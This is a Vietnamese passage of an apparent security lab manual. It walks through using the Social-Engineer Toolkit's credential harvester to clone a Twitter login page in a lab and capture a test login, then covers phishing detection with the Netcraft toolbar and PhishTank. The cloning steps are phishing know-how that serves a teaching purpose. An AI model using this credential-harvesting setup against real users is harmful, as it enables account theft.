Tiếp theo, bạn cần chọn một phương pháp sao chép một Website yêu cầu thông tin xác thực của người dùng. Mục đích của bạn là nắm bắt thông tin đăng nhập của người dùng mà người dùng sẽ cung cấp vào Trang web nhân bản. Để có thể thực hiện việc này, hãy nhập như sau:
3
Nhấn Enter .

Bước 4
SET có các mẫu được xác định trước của một số Trang web được sử dụng rộng rãi nhất. Do đó, bạn sẽ sử dụng một mẫu và sao chép Trang web. Để thực hiện việc này, hãy nhập như sau:
1
Nhấn Enter .

Bước 5
Nhập địa chỉ IP sau cho hệ thống PLABKALI01 :
192.168.0.4
Nhấn Enter .

Bước 6
Bạn cần chọn mẫu được xác định trước. Bấm phím sau:
3
Nhấn Enter .

Bước 7
Trên màn hình tiếp theo, nhấn Enter .

Bước 8
Lưu ý rằng Credential Harvester đã bắt đầu trên cổng 80 .
Thông thường, bạn sẽ gửi URL hoặc liên kết Trang web nhân bản cho người dùng qua E-mail. Trong môi trường phòng thí nghiệm này, bạn sẽ kiểm tra cách thức hoạt động của quy trình.
Kết nối với PLABWIN10

Bước 9
Mở trình duyệt Edge từ Thanh tác vụ và duyệt đến trang web sau:
http://192.168.0.4

Lưu ý: Trong trường hợp thực tế, người dùng sẽ bị lừa duyệt đến trang web mạo danh trang web gốc thông qua email hoặc cuộc gọi điện thoại. Kẻ tấn công độc hại sẽ sửa đổi trang web mạo danh để giống với trang web gốc nhất có thể.
Bước 10
Lưu ý rằng Trang web không chính xác là bản sao của Twitter , nhưng nó có tất cả các trường mà bạn yêu cầu để nắm bắt thông tin.
Cuộn xuống hộp văn bản Tên người dùng , nhập tên sau:
mjfox
Trong hộp văn bản Mật khẩu , hãy nhập mật khẩu sau:
password
Nhấp vào Đăng nhập .Lưu ý: Bạn có thể sử dụng bất kỳ tên người dùng và mật khẩu nào. Tránh sử dụng tên người dùng và mật khẩu thực. Nếu được nhắc lưu mật khẩu, hãy nhấp vào Không .

Lưu ý : Sau khi đăng nhập, trang có thể xuất hiện thông báo Không thể kết nối an toàn với trang này . Điều này sẽ không ảnh hưởng đến đầu ra PLABKALI01.
Bước 11
Chuyển về PLABKALI01
Trong cửa sổ đầu cuối thông báo rằng tên người dùng và mật khẩu đã được ghi lại.

Đóng cửa sổ đầu cuối.
Bài tập 3 – Ngăn chặn Khai thác Kỹ thuật Xã hội
Kỹ thuật xã hội là một phương pháp để thuyết phục người dùng chia sẻ thông tin bí mật, có thể là chính thức hoặc cá nhân. Ví dụ: bạn có thể nhận được một E-mail thông báo rằng tài khoản ngân hàng của bạn bị khóa hoặc bị đóng băng. Bạn cần nhấp vào URL đã cho và cung cấp thông tin đăng nhập để mở khóa tài khoản ngân hàng của mình. Đây có thể là một tình huống khó khăn đối với nhiều người dùng khi họ bị bắt và không cần suy nghĩ thứ hai, hãy nhấp vào URL và chia sẻ thông tin đăng nhập của người dùng. Phương pháp này được gọi là Phishing, là một trong những phương pháp kỹ thuật xã hội được đề cập trước đó trong mô-đun này.
Có một số phương pháp cho phép bạn phát hiện lừa đảo; bằng cách sử dụng thanh công cụ hoặc thông qua một Trang web chuyên phát hiện các trang web lừa đảo.
Trong bài tập này, bạn sẽ học cách phát hiện các trang web lừa đảo.
Kết quả học tập
Sau khi hoàn thành bài tập này, bạn sẽ có thể:
- Sử dụng Thanh công cụ Netcraft
- Sử dụng Trang web PhishTank
Thiết bị của bạn
Bạn sẽ sử dụng các thiết bị sau trong phòng thí nghiệm này. Vui lòng bật nguồn thiết bị này.
- PLABDC01 – (Windows Server 2019 – Bộ điều khiển miền)
- PLABKALI01 – (Kali 2019.2 – Máy trạm Linux Kali)
- PLABWIN10 – (Windows 10 – Thành viên miền)

Nhiệm vụ 1 – Cài đặt Firefox
Firefox là một trình duyệt Web được phát triển bởi Mozilla.
Trong phần này, bạn sẽ học cách cài đặt Firefox. Để thực hiện việc này, hãy thực hiện các bước sau:
Bước 1
Đảm bảo rằng bạn đã đăng nhập vào PLABWIN10 .
Nhấp vào biểu tượng Microsoft Edge trên thanh tác vụ.

Bước 2
Sau khi trang web Intranet được tải, hãy nhấp vào Cài đặt_Files .

Bước 3
Trên Installation_Files trang, nhấp vào Firefox .

Bước 4
Trên trang Firefox , nhấp vào Thiết lập Firefox 67.0.exe .

Bước 5
Trong thanh thông báo, nhấp vào Chạy .

Bước 6
Một hộp thoại hiển thị quá trình trích xuất tệp đang diễn ra.

Bước 7
Các cài đặt Mozilla Firefox hộp thoại sẽ được hiển thị. Trên trang Chào mừng bạn đến với trang Hướng dẫn thiết lập Mozilla Firefox , nhấp vào Tiếp theo .

Bước 8
Trên trang Loại thiết lập , giữ lựa chọn mặc định và nhấp vào Tiếp theo .

Bước 9
Trên trang Tóm tắt , bấm Cài đặt .

Bước 10
Trên trang Cài đặt , tiến trình cài đặt được hiển thị.

Bước 11
Trên trang Hoàn tất Trình hướng dẫn Thiết lập Mozilla Firefox , hãy nhấp vào Kết thúc .

Bước 12
Đóng cửa sổ Microsoft Edge .

Nhiệm vụ 2 – Sử dụng Thanh công cụ Netcraft
Thanh công cụ Netcraft được thiết kế để bảo vệ người dùng khỏi các cuộc tấn công lừa đảo. Đây là một trình cắm thêm của trình duyệt Web phát hiện một Trang web bị lừa đảo khi bạn truy cập trang web đó.
Trong nhiệm vụ này, bạn sẽ học cách cài đặt và sử dụng thanh công cụ Netcraft. Để thực hiện việc này, hãy thực hiện các bước sau:
Bước 1
Cửa sổ Microsoft Edge mở ra. Trong thanh địa chỉ, hãy nhập URL sau:
toolbar.netcraft.com
Nhấn Enter .

Bước 2
Các Netcraft mở rộng trang chủ sẽ được hiển thị.
Nhấp vào nút Tải xuống phần mở rộng Netcraft .

Bước 3
Trên trang Tải xuống ngay , cuộn xuống và nhấp vào biểu tượng Firefox .

Bước 4
Trên trang Tiện ích mở rộng Netcraft , nhấp vào tùy chọn Thêm vào Firefox .

Bước 5
Trên cửa sổ bật lên Thêm Tiện ích mở rộng Netcraft , hãy chọn Thêm .

Bước 6
Lưu ý rằng biểu tượng Netcraft hiện đã được thêm vào bên phải của thanh công cụ trong Microsoft Edge . Nhấp vào biểu tượng này.

Bước 7
Vì bạn đang ở trên addons.mozilla.org, nó cung cấp thông tin chi tiết cho Trang web này.

Bước 8
Trong thanh địa chỉ, hãy nhập URL sau:
https://www.exploit-db.com
Nhấn Enter .

Bước 9
Nhấp vào biểu tượng Netcraft . Lưu ý rằng các chi tiết về Trang web hiện đã được hiển thị.

Giữ cửa sổ Firefox mở.
Nhiệm vụ 3 – Sử dụng Trang web PhishTank
PhishTank là một Trang web chứa một kho lưu trữ các Trang web bị lừa đảo. Bạn chỉ cần nhập một URL và URL đó sẽ cung cấp thông tin chi tiết về việc nó có bị lừa đảo hay không.
Trong tác vụ này, bạn sẽ sử dụng Trang web PhishTank. Để thực hiện việc này, hãy thực hiện các bước sau:
Bước 1
Đảm bảo rằng bạn đã đăng nhập vào PLABWIN10 .
Đảm bảo Firefox đang mở.
Trong thanh địa chỉ, hãy nhập URL sau:
https://www.phishtank.com
Nhấn Enter .

Bước 2
Trang web PhishTank được hiển thị. Trong phần Tìm thấy một trang web lừa đảo? hộp văn bản, nhập URL sau:
http://testphp.vulnweb.com
Nhấp vào Nó có phải là lừa đảo không?Lưu ý: Bạn có thể tìm kiếm một Trang web hoặc chọn một trang web từ danh sách nhất định.

Bước 3
Chú ý rằng kết quả được hiển thị.
